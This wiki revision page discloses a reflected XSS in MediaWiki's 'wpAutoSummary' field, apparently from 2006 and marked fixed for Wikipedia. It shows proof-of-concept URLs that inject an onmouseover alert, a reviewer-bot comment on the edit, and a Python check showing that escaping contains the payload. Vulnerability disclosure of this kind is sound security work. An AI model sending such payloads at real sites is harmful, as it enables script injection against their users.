Difference between revisions of "MediaWiki/Parser43"

From Nick Jenkins
m
 
Line 4: Line 4:
  
 
Proof-of-Concept, on my personal wiki:
 
Proof-of-Concept, on my personal wiki:
http://get-to-post.nickj.org/?http://nickj.org/index.php?title=MediaWiki/Parser43&action=edit&wpTextbox1=Try+moving+cursor+over+red+text+at+bottom+of+page+for+popup&wpPreview=1&wpAutoSummary=%22+%2F%3E%3Ch1+style%3D%22text-align%3A+center%3B+font-size%3A+50pt%3B+color%3A+red%22+onmouseover%3D%22alert%28%27Ownage%21%27%29%3B%22%3EOWNAGE%3C%2Fh1%3E%3Chr+style%3D%22a
+
http://get-to-post.nickj.org/?http://nickj.org/index.php?title=Talk:MediaWiki/Parser43&action=edit&wpTextbox1=Try+moving+cursor+over+red+text+at+bottom+of+page+for+popup&wpPreview=1&wpAutoSummary=%22+%2F%3E%3Ch1+style%3D%22text-align%3A+center%3B+font-size%3A+50pt%3B+color%3A+red%22+onmouseover%3D%22alert%28%27Ownage%21%27%29%3B%22%3EOWNAGE%3C%2Fh1%3E%3Chr+style%3D%22a
  
 
Proof-of-Concept, on the English Wikipedia:  
 
Proof-of-Concept, on the English Wikipedia:  
 
http://get-to-post.nickj.org/?http://en.wikipedia.org/wiki/index.php?title=TESTTEST&action=edit&wpTextbox1=test&wpPreview=1&wpAutoSummary=%22+%2F%3E%3Ch1+style%3D%22text-align%3A+center%3B+font-size%3A+50pt%3B+color%3A+red%22+onmouseover%3D%22alert%28%27Ownage%21%27%29%3B%22%3EOWNAGE%3C%2Fh1%3E%3Chr+style%3D%22a
 
http://get-to-post.nickj.org/?http://en.wikipedia.org/wiki/index.php?title=TESTTEST&action=edit&wpTextbox1=test&wpPreview=1&wpAutoSummary=%22+%2F%3E%3Ch1+style%3D%22text-align%3A+center%3B+font-size%3A+50pt%3B+color%3A+red%22+onmouseover%3D%22alert%28%27Ownage%21%27%29%3B%22%3EOWNAGE%3C%2Fh1%3E%3Chr+style%3D%22a
 
(will need to scroll down page to see). (Note: this is now fixed).
 
(will need to scroll down page to see). (Note: this is now fixed).
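Review bot: the personal-wiki link on the line marked + now targets title=Talk:MediaWiki/Parser43, but unlike the English Wikipedia link it carries no status note; the unchanged context says "(Note: this is now fixed)" only for the Wikipedia case. Suggest stating whether the personal-wiki proof of concept still reproduces. The revision is also flagged minor ("m") and shows no edit summary, so the reason for moving the link to the Talk page should be given in one.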

Latest revision as of 08:00, 16 June 2006

XSS: arbitrary JavaScript execution and HTML insertion.

The problem is the "wpAutoSummary" field.

Proof-of-Concept, on my personal wiki: http://get-to-post.nickj.org/?http://nickj.org/index.php?title=Talk:MediaWiki/Parser43&action=edit&wpTextbox1=Try+moving+cursor+over+red+text+at+bottom+of+page+for+popup&wpPreview=1&wpAutoSummary=%22+%2F%3E%3Ch1+style%3D%22text-align%3A+center%3B+font-size%3A+50pt%3B+color%3A+red%22+onmouseover%3D%22alert%28%27Ownage%21%27%29%3B%22%3EOWNAGE%3C%2Fh1%3E%3Chr+style%3D%22a

Proof-of-Concept, on the English Wikipedia: http://get-to-post.nickj.org/?http://en.wikipedia.org/wiki/index.php?title=TESTTEST&action=edit&wpTextbox1=test&wpPreview=1&wpAutoSummary=%22+%2F%3E%3Ch1+style%3D%22text-align%3A+center%3B+font-size%3A+50pt%3B+color%3A+red%22+onmouseover%3D%22alert%28%27Ownage%21%27%29%3B%22%3EOWNAGE%3C%2Fh1%3E%3Chr+style%3D%22a (you will need to scroll down the page to see it). (Note: this is now fixed).
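One way to check that a reflected form field like this is safe is to parse the rendered markup with and without attribute escaping. This is an added example, not MediaWiki's code: the hidden-input template is an assumed shape for the edit form (the page does not show the markup), and `TagAudit`, `render`, `audit` and `poc_value` are hypothetical names.

```python
import html
from html.parser import HTMLParser
from urllib.parse import unquote_plus

# wpAutoSummary value copied from the proof-of-concept URLs on this page.
POC_PARAM = ("%22+%2F%3E%3Ch1+style%3D%22text-align%3A+center%3B+font-size%3A+50pt%3B"
             "+color%3A+red%22+onmouseover%3D%22alert%28%27Ownage%21%27%29%3B%22%3E"
             "OWNAGE%3C%2Fh1%3E%3Chr+style%3D%22a")

# ASSUMPTION: shape of the form field the value is reflected into.
TEMPLATE = '<input type="hidden" name="wpAutoSummary" value="{}" />'


class TagAudit(HTMLParser):
    """Records the tags the parser sees, any on* handlers, and the field's value."""

    def __init__(self):
        super().__init__()
        self.tags, self.handlers, self.field_value = [], [], None

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        for name, value in attrs:
            if name.startswith("on"):            # event-handler attribute
                self.handlers.append((tag, name, value))
            if tag == "input" and name == "value":
                self.field_value = value


def poc_value():
    """URL-decode the parameter the way the server receives it."""
    return unquote_plus(POC_PARAM)


def render(value, escape):
    """Write the value into the attribute, with or without HTML escaping."""
    return TEMPLATE.format(html.escape(value, quote=True) if escape else value)


def audit(markup):
    parser = TagAudit()
    parser.feed(markup)
    parser.close()
    return parser


if __name__ == "__main__":
    for escape in (False, True):
        result = audit(render(poc_value(), escape))
        print(f"escaped={escape}: tags={result.tags} handlers={result.handlers}")
```

Without escaping, the leading `" />` in the value closes the attribute and the tag, so the rest is parsed as new elements; with escaping, the whole string stays inside the one `value` attribute.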